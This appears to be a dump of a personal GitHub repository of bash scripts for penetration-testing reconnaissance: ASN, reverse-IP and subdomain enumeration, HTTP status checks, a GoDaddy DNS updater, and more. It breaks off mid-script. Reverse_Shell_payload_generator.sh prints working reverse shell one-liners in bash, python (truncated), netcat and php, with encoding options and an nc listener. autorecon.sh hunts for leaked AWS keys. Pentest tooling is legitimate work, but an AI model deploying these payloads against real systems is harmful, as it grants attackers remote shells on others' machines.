├── .all-contributorsrc ├── ASNenum.sh ├── DomainToIP.sh ├── Get_all_domains.sh ├── README.md ├── ReverseIP.sh ├── Reverse_Shell_payload_generator.sh ├── StatusCode.sh ├── autorecon.sh ├── awscript.sh ├── ddns_godaddy.sh ├── domains.sh ├── downlocal.sh ├── elastic.sh ├── encall.sh ├── enumnom.sh ├── file-share.sh ├── google-hacking.sh ├── lf.sh ├── monitor.sh ├── music.sh ├── mynmap.sh ├── mywhois.sh ├── naabu-to-nmap.sh ├── netspace.sh ├── port.sh ├── reclass.sh ├── recon.sh ├── send-to-burp.sh ├── setup-tools.sh ├── title.sh └── vpn_on_vps.sh /.all-contributorsrc: -------------------------------------------------------------------------------- 1 | { 2 | "files": [ 3 | "README.md" 4 | ], 5 | "imageSize": 100, 6 | "commit": false, 7 | "contributors": [ 8 | { 9 | "login": "terminalforlife", 10 | "name": "Terminal for Life", 11 | "avatar_url": "https://avatars3.githubusercontent.com/u/31768530?v=4", 12 | "profile": "https://www.youtube.com/channel/UCfp-lNJy4QkIGnaEE6NtDSg", 13 | "contributions": [ 14 | "code" 15 | ] 16 | } 17 | ], 18 | "contributorsPerLine": 7, 19 | "projectName": "bash_scripting", 20 | "projectOwner": "bing0o", 21 | "repoType": "github", 22 | "repoHost": "https://github.com", 23 | "skipCi": true 24 | } 25 | -------------------------------------------------------------------------------- /ASNenum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # if the first argument is an IP, the response will be the ASNumber 4 | # if the first argument is an ASN, the response will be a list of CIDRS 5 | # 6 | 7 | [ -z "$1" ] && { printf "[!] 
Usage: ${0##*/} \n"; exit 1; } 8 | 9 | IP() { 10 | curl -sk "https://api.hackertarget.com/aslookup/?q=$1" | awk '{gsub(/,/,"\n",$0); gsub(/\"/,"",$0); print "ASN: AS"$2 "\nCIDR: "$3 "\nORG: "$4}' 11 | } 12 | 13 | ASN() { 14 | curl -sk https://api.hackertarget.com/aslookup/\?q\=$1 | grep -v "," 15 | } 16 | 17 | if [[ $1 =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then 18 | IP $1 19 | else 20 | ASN $1 21 | fi 22 | -------------------------------------------------------------------------------- /DomainToIP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Simple bash script to get IP address From hostname 4 | # 5 | 6 | [ -z "$1" ] && { printf "[!] ${0##*/} \n"; exit 1; } 7 | 8 | NSL() { 9 | nslookup "$1" | grep -v "#53" | grep Address | awk '{print $2}' 10 | } 11 | 12 | 13 | while read host 14 | do 15 | #printf "\n[+] Host: $host\n" 16 | NSL $host 17 | done < "$1" 18 | -------------------------------------------------------------------------------- /Get_all_domains.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # bash script to enumerate for all domains related to your target based on the Registrare Email/Name. 4 | # 5 | 6 | [ -z "$1" ] && { echo "[!] 
./alldomains.sh "; exit 1; } 7 | 8 | curl -s -XPOST https://reverse-whois-api.whoisxmlapi.com/api/v2 -d "{\"apiKey\": \"YOUR_API_KEY\",\"mode\": \"purchase\",\"basicSearchTerms\": {\"include\": [\"$1\"]}}" | tr ',\|[' '\n' | cut -d '"' -f 2 | grep -v "domainsCount\|domainsList" 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bash_scripting 2 | 3 | [![All Contributors](https://img.shields.io/badge/all_contributors-1-orange.svg?style=flat-square)](#contributors) 4 | 5 | [![Bash Shell](https://badges.frapsoft.com/bash/v1/bash.png?v=103)](https://github.com/ellerbrock/open-source-badges/) 6 | 7 | ### Description: 8 | bash scripts I use daily to automate some stuff and make linux easier, there's no specific purpose behind this repo only to share any script that i think will be usefull for somebody else, or anyone who wants to learn bash script and needs some ideas to practice (that's how i learnt :D) 9 | 10 | Most of the script in this repo has some comments inside to explain the purpose of the script and how it can be used, but i'm gonna leave here a description for some of them and how they can be used if needed. 11 | 12 | - [ASNenum.sh](https://github.com/bing0o/bash_scripting/blob/master/ASNenum.sh): 13 | this script use [api.hackertarget.com](https://api.hackertarget.com/aslookup/) to do ASN Enumeration against an IP address or ASN number, if the input is an IP address you will get an ASN number and a CIDR, if the input is an ASN you will get a list of CIDRs (one or more) that belongs to the same owner. 14 | 15 | - [DomainToIP.sh](https://github.com/bing0o/bash_scripting/blob/master/DomainToIP.sh): 16 | wrapper around nslookup linux cli tool to translate hostnames to IPs. 
17 | 18 | - [Get_all_domains.sh](https://github.com/bing0o/bash_scripting/blob/master/Get_all_domains.sh): 19 | uses https://reverse-whois-api.whoisxmlapi.com/ to enumerate TLDs (Top Level Domains) that belong to the same owner based on Registrant Email/Name whois records. 20 | 21 | - [ReverseIP](https://github.com/bing0o/bash_scripting/blob/master/ReverseIP.sh): 22 | script to do a reverse IP lookup: you give this script an IP address and it will try to find all the domains hosted on that IP. 23 | 24 | - [Reverse_Shell_payload_generator.sh](https://github.com/bing0o/bash_scripting/blob/master/Reverse_Shell_payload_generator.sh): 25 | this is a script that generates reverse shell payloads for you, more info can be found here: https://bing0o.github.io/posts/reverse-shell-generator/ 26 | 27 | - [StatusCode.sh](https://github.com/bing0o/bash_scripting/blob/master/StatusCode.sh): 28 | checks the status code, size, redirected URL and the title for a list of domains or IPs. 29 | 30 | - [domains.sh](https://github.com/bing0o/bash_scripting/blob/master/domains.sh): 31 | this tool is no longer going to be updated, check the newer version here: https://github.com/bing0o/SubEnum 32 | 33 | - [encall.sh](https://github.com/bing0o/bash_scripting/blob/master/encall.sh): 34 | wrapper around my other python tool ([crypto](https://github.com/bing0o/Python-Scripts/blob/master/crypto.py) which is a tool to encrypt and decrypt files), to encrypt all the files in the current directory. 35 | 36 | - [file-share.sh](https://github.com/bing0o/bash_scripting/blob/master/file-share.sh): 37 | uses https://www.file.io/ to share files; this tool provides a one-time-use link for the shared file, which will no longer be available after the first download. Useful when you want to transfer small files between two systems.
38 | 39 | - [naabu-to-nmap.sh](https://github.com/bing0o/bash_scripting/blob/master/naabu-to-nmap.sh): 40 | this script takes the results of [naabu](https://github.com/projectdiscovery/naabu) and runs nmap against them with the `default` and `vuln` scripts and other options, to go deeper on each port `naabu` found. 41 | 42 | - [port.sh](https://github.com/bing0o/bash_scripting/blob/master/port.sh): 43 | simple port scanner for fast results, I use it to check if a specific port is open on a remote server. 44 | 45 | - [send-to-burp.sh](https://github.com/bing0o/bash_scripting/blob/master/send-to-burp.sh): 46 | bash script to send a list of URLs from the command line to burpsuite to add them to your site map, without having to open them in the browser. 47 | 48 | - [vpn_on_vps.sh](https://github.com/bing0o/bash_scripting/blob/master/vpn_on_vps.sh): 49 | if you run a VPN on a remote server for whatever reason, you will lose your ssh connection and you won't be able to connect to the remote server until the VPN connection is down. This script prevents that from happening: when you run it on the remote server before starting your VPN client, you won't lose your ssh connection and you can still connect to the server while the VPN is up and running. 50 | 51 | 52 | ## Support 53 | you can support me here: https://www.buymeacoffee.com/bing0o 54 | 55 | ## Contributors ✨ 56 | 57 | Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)): 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 |
Terminal for Life
Terminal for Life

💻
67 | 68 | 69 | 70 | 71 | 72 | This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome! 73 | -------------------------------------------------------------------------------- /ReverseIP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Simple bash script for Reverse IP Lookup, 4 | # To get all the domains hosted on the server 5 | # 6 | # Don't forget to put your API key in YOUR_API_KEY 7 | # 8 | 9 | PRG=${0##*/} 10 | 11 | API_cred() { 12 | cmd=$(curl -sk "https://reverse-ip.whoisxmlapi.com/api/v1?apiKey=YOUR_API_KEY&ip=$ip" | sed 's/,/\n/g' | grep "name" | sed 's/.*:\|"//g') 13 | [ "$out" == False ] && printf "$cmd\n" || { printf "$cmd\n" | tee -a $out; } 14 | } 15 | 16 | API() { 17 | cmd=$(curl -sk "https://api.hackertarget.com/reverseiplookup/?q=$ip") 18 | [ "$out" == False ] && printf "$cmd\n" || { printf "$cmd\n" | tee -a $out; } 19 | } 20 | 21 | Usage() { 22 | while read -r line; do 23 | printf "%b\n" "$line" 24 | done <<-EOF 25 | \rOptions: 26 | \r -t, --type - Type of the API (Dafault: ht), 27 | \r wxa -> WhoisXmlApi, ht -> HackerTarget, all -> To use both 28 | \r -i, --ip - The Target IP. 29 | \r -o, --output - The OutPut File. 30 | \r -l, --loop - To use pipe e.g(cat ips.txt | $PRG -l) 31 | \rExample: 32 | \r $PRG --type all --ip 8.8.8.8 --output hosts.txt 33 | \r cat IPs.txt | $PRG --loop --output hosts.txt 34 | EOF 35 | } 36 | 37 | ip=False 38 | type=ht 39 | loop=False 40 | out=False 41 | 42 | while [ -n "$1" ]; do 43 | case $1 in 44 | -t|--type) 45 | [ "$2" != "wxa" ] && [ "$2" != "ht" ] && [ "$2" != "all" ] && { printf "[!] 
-t/--type must be [wxa, ht, all], use -h for more information\n"; exit 1; } 46 | type=$2 47 | shift ;; 48 | -i|--ip) 49 | ip=$2 50 | shift ;; 51 | -l|--loop) 52 | loop=True ;; 53 | -o|--output) 54 | out=$2 55 | shift ;; 56 | *) 57 | Usage 58 | exit 1 ;; 59 | esac 60 | shift 61 | done 62 | 63 | TYPE() { 64 | [ "$type" == all ] && { 65 | API 66 | API_cred 67 | } || { 68 | [ type == wxa ] && API_cred || API 69 | } 70 | } 71 | 72 | [ "$ip" == False ] && [ "$loop" == False ] && { printf "[!] Arguments -i/--ip or -l/--loop are required!, Enter -h for more information!\n"; exit 1; } 73 | 74 | [ "$ip" != False ] && { 75 | TYPE 76 | } || { 77 | while read ip; do 78 | TYPE 79 | done 80 | } 81 | 82 | -------------------------------------------------------------------------------- /Reverse_Shell_payload_generator.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Bash script to generate reverse shell payloads in python, php, netcat and bash | easy and fast :D 4 | # Updates will pushed to this repo: https://github.com/bing0o/Reverse_Shell_Generator/ 5 | # This tool Required for URL Encoding: https://github.com/ffuf/pencode 6 | # 7 | 8 | TYPE="bash" 9 | IP="$(ifconfig tun0 2>/dev/null | grep netmask | awk '{print $2}')" 10 | PORT="$(shuf -i 10000-65000 -n 1)" 11 | INTERFACE=False 12 | RUN=False 13 | ENCODE=False 14 | ENCODERS=( 15 | base64 16 | url 17 | ) 18 | 19 | 20 | 21 | Usage(){ 22 | while read -r line; do 23 | printf "%b\n" "$line" 24 | done <<-EOF 25 | \r#OPTIONS: 26 | \r -t, --type - Payload Type [python, netcat, bash, php]. 27 | \r -i, --ip - Local IP. 28 | \r -p, --port - Local Port. 29 | \r -r, --run - Run Netcat Listener. 30 | \r -e, --encode - Encode The Payload [base64, url]. 31 | \r -I, --interface - Get The IP From Specific Interface (Default: tun0). 32 | \r -h, --help - Prints The Help and Exit. 
33 | \r 34 | EOF 35 | exit 36 | } 37 | 38 | 39 | while [ -n "$1" ]; do 40 | case $1 in 41 | -t|--type) 42 | TYPE="$2" 43 | shift ;; 44 | -i|--ip) 45 | IP="$2" 46 | shift ;; 47 | -p|--port) 48 | PORT="$2" 49 | shift ;; 50 | -r|--run) 51 | RUN=True ;; 52 | -e|--encode) 53 | ENCODE="$2" 54 | if [[ ! " ${ENCODERS[@]} " =~ " ${ENCODE} " ]]; then 55 | printf "[!] Unknown Encoder: $ENCODE\n" 56 | Usage 57 | fi 58 | shift ;; 59 | -I|--interface) 60 | INTERFACE="$2" 61 | shift ;; 62 | -h|--help) 63 | Usage ;; 64 | *) 65 | echo "[-] Unknown Option: $1" 66 | Usage ;; 67 | esac 68 | shift 69 | done 70 | 71 | 72 | Payload(){ 73 | [ "$INTERFACE" != False ] && IP="$(ifconfig $INTERFACE 2>/dev/null | grep netmask | awk '{print $2}')" 74 | [ "$TYPE" == "bash" ] && PAYLOAD="bash -i >& /dev/tcp/$IP/$PORT 0>&1" 75 | [ "$TYPE" == "python" ] && PAYLOAD="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$IP\",$PORT));o" 76 | [ "$TYPE" == "netcat" ] && PAYLOAD="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/f" 77 | [ "$TYPE" == "php" ] && PAYLOAD="php -r '\$sock=fsockopen(\"$IP\",$PORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" 78 | 79 | [[ "$ENCODE" == False ]] && echo "$PAYLOAD" || { 80 | [ "$ENCODE" == "base64" ] && echo "$PAYLOAD" | base64 -w 0 81 | [ "$ENCODE" == "url" ] && echo "$PAYLOAD" | pencode urlencode 82 | } 83 | } 84 | 85 | 86 | Payload; echo 87 | 88 | 89 | [ "$RUN" != False ] && printf "\n[+] Starting Netcat Listener:\n" && nc -nvlp $PORT 90 | -------------------------------------------------------------------------------- /StatusCode.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # bash script to check for status code, size, redirected url and the Title for a list of domains or ips 4 | # 5 | 6 | PRG=${0##*/} 7 | VERSION="2020-03-24" 8 | 9 | Usage(){ 10 | while read -r line; do 11 | printf "%b\n" "$line" 12 | done <<-EOF 13 | \r$PRG:\t\t - 
Tool reads a list of Domanis or IPs and gives you: status code, size, redirected link and the Title. 14 | \r 15 | \rOptions: 16 | \r -l, --list - List of Domains or IPs. 17 | \r -t, --Threads - Threads number (Default: 5). 18 | \r -s, --status - Display only The specified Status Code. 19 | \r -o, --output - The output file to save the results. 20 | \r -p, --path - To use a specific path ex(/robots.txt). 21 | \r -n, --nocolor - Displays the Status code without color. 22 | \r -h, --help - Displays this Informations and Exit. 23 | \r -v, --version - Displays The Version 24 | \rExample: 25 | \r $PRG -l domains.txt -t 20 -o status.txt 26 | \r 27 | 28 | EOF 29 | } 30 | 31 | list=False 32 | threads=5 33 | status=False 34 | out=False 35 | color=True 36 | path=False 37 | 38 | while [ -n "$1" ]; do 39 | case $1 in 40 | -l|--list) 41 | [ -z "$2" ] && { printf "[-] -l/--list needs a File (list of Domains or IPs)\n"; exit 1; } 42 | list=$2 43 | shift ;; 44 | -t|--threads) 45 | [ -z "$2" ] && { printf "[-] -t/--threads needs a number of threads\n"; exit 1; } 46 | threads=$2 47 | shift ;; 48 | -s|--status) 49 | status=$2 50 | shift ;; 51 | -p|--path) 52 | [ -z "$2" ] && { printf "[-] -p/--path needs a path ex(/robots.txt)\n"; exit 1; } 53 | path=$2 54 | shift ;; 55 | -o|--output) 56 | [ -z "$2" ] && { printf "[-] -o/--output needs a file to write the results to.\n"; exit 1; } 57 | out=$2 58 | shift ;; 59 | -h|--help) 60 | Usage 61 | exit ;; 62 | -v|--version) 63 | printf "$VERSION\n" 64 | exit ;; 65 | -n|--nocolor) 66 | color=False;; 67 | *) 68 | printf "[-] Error: Unknown Options: $1\n" 69 | Usage; exit 1 ;; 70 | esac 71 | shift 72 | done 73 | 74 | mycurl(){ 75 | path=$4 76 | status=$5 77 | if [[ "$path" == False ]]; then 78 | path="" 79 | elif [[ "$path" != "/"* ]]; then 80 | path="/"$path 81 | fi 82 | result=$(curl -sk $1$path --connect-timeout 10 -w '%{http_code} %{url_effective} %{size_download} %{redirect_url}\n' -o /dev/null) 83 | title=$(curl --connect-timeout 10 $1$path 
-so - | grep -iPo '(?<=)(.*)(?=)') 84 | out=$2 85 | if [[ "$3" == True ]]; then 86 | if [[ "$result" == "2"* ]]; then 87 | cresult="\e[32m$result\e[0m" 88 | elif [[ "$result" == "3"* ]]; then 89 | cresult="\e[34m$result\e[0m" 90 | elif [[ "$result" == "4"* ]]; then 91 | cresult="\e[31m$result\e[0m" 92 | else 93 | cresult="$result" 94 | fi 95 | else 96 | cresult="$result" 97 | fi 98 | [[ "$status" == False ]] && echo -e "$cresult [$title]" && [ $out != False ] && echo "$result [$title]" >> $out || { 99 | [[ "$result" == "$status"* ]] && echo -e "$cresult [$title]" 100 | [ $out != False ] && echo "$result [$title]" >> $out 101 | } 102 | 103 | } 104 | 105 | 106 | main(){ 107 | cat $list | xargs -I{} -P $threads bash -c "mycurl {} $out $color $path $status" 108 | } 109 | 110 | [ "$list" == False ] && { 111 | printf "[!] Argument -l/--list is Required!\n" 112 | Usage 113 | exit 1 114 | } || { 115 | export -f mycurl 116 | main 117 | } 118 | 119 | -------------------------------------------------------------------------------- /autorecon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | end="\e[0m" 5 | cyan="\e[36m" 6 | purple="\e[35m" 7 | 8 | read -p "[+] Enter Domain: " domain 9 | 10 | # https://github.com/s0md3v/Photon 11 | echo "" 12 | echo -e $cyan"[*] Start Photon"$end # Mapping the target application 13 | tmux split-window -h "photon '-u $domain -t 30 --wayback --dns --keys'; echo '[+] Done!'; read" 14 | echo "[!] Running in New Tmux Pane!" 
15 | #echo "[+] Results: In $domain Folder" 16 | 17 | # link: https://github.com/Edu4rdSHL/findomain 18 | echo "" 19 | echo -e $cyan"[*] Start Findomain"$end # Getting a list of subdomains 20 | findomain -t $domain -o &>/dev/null 21 | size=$(wc -l $domain.txt) 22 | echo "[+] Results: $size" 23 | 24 | 25 | 26 | # https://github.com/tomnomnom/httprobe 27 | echo -e "\n[+] HTTProbe" 28 | cat $domain.txt | httprobe > hosts 29 | echo "[*] Results: "$(wc -l hosts) 30 | 31 | # link: https://github.com/bing0o/Python-Scripts/blob/master/subchecker.py 32 | #echo "" 33 | #echo -e $cyan"[*] Start Subchecker"$end # Filter the result and save only the live subdomains 34 | #subchecker -w "$domain.txt" -t 30 -o "$domain-checked" 1>/dev/null 35 | #size=$(wc -l $domain-checked) 36 | #echo "[+] Results: $size" 37 | 38 | # link: https://github.com/bing0o/Python-Scripts/blob/master/webtech.py 39 | echo "" 40 | echo -e $cyan"[*] Start WebTech"$end # Getting the technologies that running in each subdomain 41 | webtech -w "hosts" -t 30 -o "$domain-Tech" -i 1>/dev/null 42 | size=$(wc -l $domain-Tech) 43 | echo "[+] Results: $size" 44 | 45 | # https://github.com/tomnomnom/meg 46 | echo -e "\n[+] Start Meg" 47 | meg -d 1000 -v / 48 | 49 | 50 | echo -e "\n[!] Changing The Directory To ./out" 51 | cd out 52 | 53 | # gf I changed its name to gff since i already have a linux tool called gf! 
54 | # https://github.com/tomnomnom/gf 55 | echo -e "\n[*] The OutPut For aws-keys" 56 | gff aws-keys 57 | 58 | echo -e "\n[*] The OutPut For base64" 59 | gff base64 60 | 61 | echo -e "\n[*] The OutPut For cors" 62 | gff cors 63 | 64 | echo -e "\n[*] The OutPut For debug-pages" 65 | gff debug-pages 66 | 67 | echo -e "\n[*] The OutPut For firebase" 68 | gff firebase 69 | 70 | echo -e "\n[*] The OutPut For fw" 71 | gff fw 72 | 73 | echo -e "\n[*] The OutPut For go-functions" 74 | gff go-functions 75 | 76 | echo -e "\n[*] The OutPut For http-auth" 77 | gff http-auth 78 | 79 | echo -e "\n[*] The OutPut For ip" 80 | gff ip 81 | 82 | echo -e "\n[*] The OutPut For json-sec" 83 | gff json-sec 84 | 85 | #echo -e "\n[*] The OutPut For meg-headers" 86 | #gff meg-headers 87 | 88 | echo -e "\n[*] The OutPut For php-curl" 89 | gff php-curl 90 | 91 | echo -e "\n[*] The OutPut For php-errors" 92 | gff php-errors 93 | 94 | echo -e "\n[*] The OutPut For php-serialized" 95 | gff php-serialized 96 | 97 | echo -e "\n[*] The OutPut For php-sinks" 98 | gff php-sinks 99 | 100 | echo -e "\n[*] The OutPut For php-sources" 101 | gff php-sources 102 | 103 | echo -e "\n[*] The OutPut For s3-buckets" 104 | gff s3-buckets 105 | 106 | echo -e "\n[*] The OutPut For sec" 107 | gff sec 108 | 109 | echo -e "\n[*] The OutPut For servers" 110 | gff servers 111 | 112 | #echo -e "\n[*] The OutPut For strings" 113 | #gff strings 114 | 115 | echo -e "\n[*] The OutPut For takeovers" 116 | gff takeovers 117 | 118 | echo -e "\n[*] The OutPut For upload-fields" 119 | gff upload-fields 120 | 121 | #echo -e "\n[*] The OutPut For urls" 122 | #gff urls 123 | 124 | echo -e "\n[0] Done!" 125 | 126 | -------------------------------------------------------------------------------- /awscript.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # cat ips | xargs -I% sh -c "host %" 4 | # -z True if it's a zero | -n True if it's not a zero! 
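# awscript.sh, continued: read hostnames/IPs from the file named by $1, resolve
# each one with host(1) and print the entries whose answer mentions "amazonaws".
[[ -n "${1:-}" ]] || { echo "#Usage: awscript.sh <file>" >&2; exit 1; }
[[ -r "$1" ]] || { printf '[-] Cannot read file: %s\n' "$1" >&2; exit 1; }

lines=$(wc -l < "$1")
c=1
while IFS= read -r line || [[ -n "$line" ]]; do
  # Progress indicator, overwritten in place by the trailing carriage return.
  printf '[%s/%s] %s \r' "$c" "$lines" "$line"
  c=$((c + 1))
  # The list is untrusted input: skip blank entries and anything host(1)
  # would parse as an option instead of a name.
  [[ -z "$line" || "$line" == -* ]] && continue
  res=$(host "$line")
  if [[ "$res" == *"amazonaws"* ]]; then
    # Flatten multi-line host output so every match stays on one line.
    printf '%s |  %s\n' "$line" "${res//$'\n'/ }"
  fi
done < "$1"
--------------------------------------------------------------------------------
/ddns_godaddy.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Bash script to update your godaddy dns record to your current public ip address (dynamic dns).
#
# Credentials: prefer the GODADDY_KEY / GODADDY_SECRET environment variables
# over -k/-s, because command-line arguments are visible to other local users
# in the process list.
#

# Print the option summary and exit.
Usage() {
  while read -r line; do
    printf "%b\n" "$line"
  done <<-EOF
\r#OPTIONS:
\r -i, --ip - Your Public IP Address.
\r -d, --domain - Your Domain Name (example.com).
\r -t, --type - DNS Record Type (default: A).
\r -n, --name - Subdomain Name (mysub) without domain name.
\r -k, --key - Godaddy Key (here: https://developer.godaddy.com/getstarted).
\r -s, --secret - Godaddy Secret.
\r (env) - GODADDY_KEY / GODADDY_SECRET can be used instead of -k/-s.
\r -h, --help - Displays The Help And Exit.
\r
EOF
  exit
}

# you can set default values here #
IP=""                       # empty -> auto-detected after option parsing
DOMAIN="example.com"
TYPE="A"
NAME="mysub"
KEY="${GODADDY_KEY:-}"
SEC="${GODADDY_SECRET:-}"
###################################


while [ -n "$1" ]; do
  case "$1" in
    -i|--ip)
      IP="$2"
      shift ;;
    -d|--domain)
      DOMAIN="$2"
      shift ;;
    -t|--type)
      TYPE="$2"
      shift ;;
    -n|--name)
      NAME="$2"
      shift ;;
    -k|--key)
      KEY="$2"
      shift ;;
    -s|--secret)
      SEC="$2"
      shift ;;
    -h|--help)
      Usage ;;
    *)
      echo "[-] Unknown Option: $1"
      Usage ;;
  esac
  shift
done

# Look the address up only when -i/--ip was not given. The lookup uses HTTPS
# with certificate verification left on: whatever it returns is written into
# the DNS record, so a spoofed answer would repoint the name.
[[ -n "$IP" ]] || IP="$(curl -sS https://ipinfo.io/ip)"

# Validate the address before it is placed in the JSON body or sent anywhere.
[[ ${IP} =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] || { echo "[!] Check Your Internet Connection and Try Again!"; exit 1; }

[[ -n "$KEY" && -n "$SEC" ]] || {
  echo "[-] API key and secret are required (-k/-s or GODADDY_KEY/GODADDY_SECRET)" >&2
  exit 1
}

API_URL="https://api.godaddy.com/v1/domains/${DOMAIN}/records/${TYPE}/${NAME}"
DATA="[{\"data\": \"${IP}\", \"ttl\": 600}]"
HEADERS="Authorization: sso-key ${KEY}:${SEC}"

# "-H @-" makes curl read the header from stdin (curl >= 7.55.0), so the API
# key and secret do not appear in curl's argument list.
DNS=$(curl -s -XGET -H @- "$API_URL" <<<"$HEADERS" | jq -r '.[].data')

# Quoted right-hand side: compare literally instead of treating the API's
# answer as a glob pattern.
[[ "${IP}" == "${DNS}" ]] && { echo "[!] Same IP, No Need To Update!"; exit 0; }

echo "New IP: ${IP}"

echo "[+] Updating DNS Record...."

# No -k here: this request carries the API credentials, so TLS certificate
# verification has to stay enabled. --fail turns an HTTP error into a non-zero
# exit status so a rejected update is not reported as success.
curl -sS --fail -XPUT \
  -H "Content-Type: application/json" \
  -H "Accept: application/json" \
  -H @- \
  -d "${DATA}" \
  "$API_URL" <<<"$HEADERS" \
  || { echo "[-] DNS update failed" >&2; exit 1; }

echo "[+] Done!"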
77 | -------------------------------------------------------------------------------- /domains.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # script for subdomain enumeration using 4 of the best tools and some online services: 4 | # * findomain: https://github.com/Edu4rdSHL/findomain 5 | # * SubFinder: https://github.com/projectdiscovery/subfinder 6 | # * Amass: https://github.com/OWASP/Amass 7 | # * AssetFinder: https://github.com/tomnomnom/assetfinder 8 | # 9 | 10 | bold="\e[1m" 11 | Underlined="\e[4m" 12 | red="\e[31m" 13 | green="\e[32m" 14 | blue="\e[34m" 15 | end="\e[0m" 16 | VERSION="2022-03-20" 17 | 18 | PRG=${0##*/} 19 | 20 | 21 | Usage(){ 22 | while read -r line; do 23 | printf "%b\n" "$line" 24 | done <<-EOF 25 | \r 26 | \r# ${bold}${blue}Options${end}: 27 | \r -d, --domain - Domain To Enumerate 28 | \r -l, --list - List of domains 29 | \r -u, --use - Tools To Be Used ex(Findomain,Subfinder,...,etc) 30 | \r -e, --exclude - Tools To Be Excluded ex(Findomain,Amass,...,etc) 31 | \r -o, --output - The output file to save the Final Results (Default: -DATE-TIME.txt) 32 | \r -s, --silent - The Only output will be the found subdomains - (Results saved: subenum-.txt). 33 | \r -k, --keep - To Keep the TMPs files (the results from each tool). 34 | \r -r, --resolve - To Probe For Working HTTP and HTTPS Subdomains, (Output: resolved-.txt). 35 | \r -t, --thread - Threads for Httprobe - works with -r/--resolve option (Default: 40) 36 | \r -p, --parallel - To Use Parallel For Faster Results, Doesn't Work With -e/--exclude or -u/--use. 37 | \r -h, --help - Displays this help message and exit. 38 | \r -v, --version - Displays the version and exit. 
39 | 40 | \r# ${bold}${blue}Available Tools${end}: 41 | \r wayback,crt,bufferover,Findomain,Subfinder,Amass,Assetfinder 42 | 43 | \r# ${bold}${blue}Examples${end}: 44 | \r - To use a specific Tool(s): 45 | \r $PRG -d hackerone.com -u Findomain,wayback,Subfinder 46 | \r - To exclude a specific Tool(s): 47 | \r $PRG -d hackerone.com -e Amass,Assetfinder 48 | \r - To use all the Tools: 49 | \r $PRG -d hackerone.com 50 | \r - To run SubEnum.sh against a list of domains: 51 | \r $PRG -l domains.txt 52 | \r - Run with parallel for faster results, (Doesn't work with -e/--exclude or -u/--use). 53 | \r 1- $PRG --domain target.com --parallel 54 | \r 2- $PRG --list domains.txt --parallel 55 | EOF 56 | exit 1 57 | } 58 | 59 | 60 | spinner(){ 61 | processing="${1}" 62 | while true; 63 | do 64 | dots=( 65 | "/" 66 | "-" 67 | "\\" 68 | "|" 69 | ) 70 | for dot in ${dots[@]}; 71 | do 72 | printf "[${dot}] ${processing} \U1F50E" 73 | printf " \r" 74 | sleep 0.3 75 | done 76 | 77 | done 78 | } 79 | 80 | 81 | wayback() { 82 | [ "$silent" == True ] && curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$domain&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u | anew subenum-$domain.txt || { 83 | [[ ${PARALLEL} == True ]] || { spinner "${bold}WayBackMachine${end}" & 84 | PID="$!" 85 | } 86 | curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$domain&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u > tmp-wayback-$domain 87 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 88 | echo -e "$bold[*] WayBackMachine$end: $(wc -l < tmp-wayback-$domain)" 89 | } 90 | } 91 | 92 | crt() { 93 | [ "$silent" == True ] && curl -sk "https://crt.sh/?q=%.$domain&output=json" | tr ',' '\n' | awk -F'"' '/name_value/ {gsub(/\*\./, "", $4); gsub(/\\n/,"\n",$4);print $4}' | anew subenum-$domain.txt || { 94 | [[ ${PARALLEL} == True ]] || { spinner "${bold}crt.sh${end}" & 95 | PID="$!" 
96 | } 97 | curl -sk "https://crt.sh/?q=%.$domain&output=json" | tr ',' '\n' | awk -F'"' '/name_value/ {gsub(/\*\./, "", $4); gsub(/\\n/,"\n",$4);print $4}' | sort -u > tmp-crt-$domain 98 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 99 | echo -e "$bold[*] crt.sh$end: $(wc -l < tmp-crt-$domain)" 100 | } 101 | } 102 | 103 | bufferover() { 104 | [ "$silent" == True ] && curl -s "https://dns.bufferover.run/dns?q=.$domain" | grep $domain | awk -F, '{gsub("\"", "", $2); print $2}' | anew subenum-$domain.txt || { 105 | [[ ${PARALLEL} == True ]] || { spinner "${bold}BufferOver${end}" & 106 | PID="$!" 107 | } 108 | curl -s "https://dns.bufferover.run/dns?q=.$domain" | grep $domain | awk -F, '{gsub("\"", "", $2); print $2}' | sort -u > tmp-bufferover-$domain 109 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 110 | echo -e "$bold[*] BufferOver$end: $(wc -l < tmp-bufferover-$domain)" 111 | } 112 | } 113 | 114 | Findomain() { 115 | [ "$silent" == True ] && findomain -t $domain -q 2>/dev/null | anew subenum-$domain.txt || { 116 | [[ ${PARALLEL} == True ]] || { spinner "${bold}Findomain${end}" & 117 | PID="$!" 118 | } 119 | findomain -t $domain -u tmp-findomain-$domain &>/dev/null 120 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 121 | echo -e "$bold[*] Findomain$end: 